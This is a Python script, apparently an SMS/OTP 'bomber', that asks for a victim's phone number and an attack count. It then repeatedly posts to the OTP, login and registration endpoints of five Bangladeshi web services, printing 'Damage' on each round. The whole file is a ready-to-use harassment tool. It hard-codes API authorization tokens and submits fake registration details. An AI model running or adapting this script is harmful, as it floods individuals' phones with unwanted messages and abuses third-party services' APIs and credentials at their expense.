import requests
from requests.structures import CaseInsensitiveDict

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("""


   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝




""")

number  = str(input("[>] Heii Sir.... apNar aTTack NumBer DiN: "))

amount = int(input("[>] Sir.... apNar aTTack ar PoriMaN LikHuN: "))



url2 = "http://api.myguardianbd.com:80/api/requestOtp"

headers2 = CaseInsensitiveDict()
headers2["Content-Type"] = "application/x-www-form-urlencoded"

headers2["Authorization"] = "Bearer ef9d4e34ba990125803cef38460d2d3fa86db5691397013f03fca316c3705090f27125f4e4cf34ef7921f2862023881ab4c3"

data2 = "new=1&device_id=40d4801634a656ee&mobile="+number

url4 = "https://green-delta.com/api/api.php?action=userRegistrationForm"

headers4 = CaseInsensitiveDict()
headers4["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"

data4 = "firstname=KiinG&lastname=OF+GhOsT&userphone="+number+"&useremail=mdsimohoncircleking%40gmail.com&usernid=2155464684048&date_of_birth=2022-03-31&userpassword=mmmmmm&userconfirmpassword=mmmmmm&useRegistration=Registration"

url5 = "http://nesco.sslwireless.com:80/api/v1/login"

headers5 = CaseInsensitiveDict()
headers5["Content-Type"] = "application/x-www-form-urlencoded"

data5 = "phone_number="+number


url11 = "https://prodapi.swap.com.bd/api/v1/send-otp/login"

headers11 = CaseInsensitiveDict()

headers11["X-Authorization"]= "QoFN68MGTcosJxSmDf5GCgxXlNcgE1mUH9MUWuDHgs7dugjR7P2ziASzpo3frHL3"

headers11["Content-Type"] = "application/json;charset=utf-8"

data11 = '{"mobile_number":"'+number+'","referral":false}'


url8 = "https://shopup.com.bd/users/send_user_otp.json"

headers8 = CaseInsensitiveDict()
headers8["Content-Type"] = "application/json"

data8 = '{"user":{"login":"88'+number+'","resend":false,"type":{"register":true}},"direct_login":true}'


for i in range(amount):
		
		resp2 = requests.post(url2, headers=headers2, data=data2)
		
		resp4 = requests.post(url4, headers=headers4, data=data4)
		
		resp5= requests.post(url5, headers=headers5,  data=data5)
		
		resp8 = requests.post(url8, headers=headers8, data=data8)
		
		resp11 = requests.post(url11, headers=headers11, data=data11)
		
		print(str (i+1)+" Damage \n")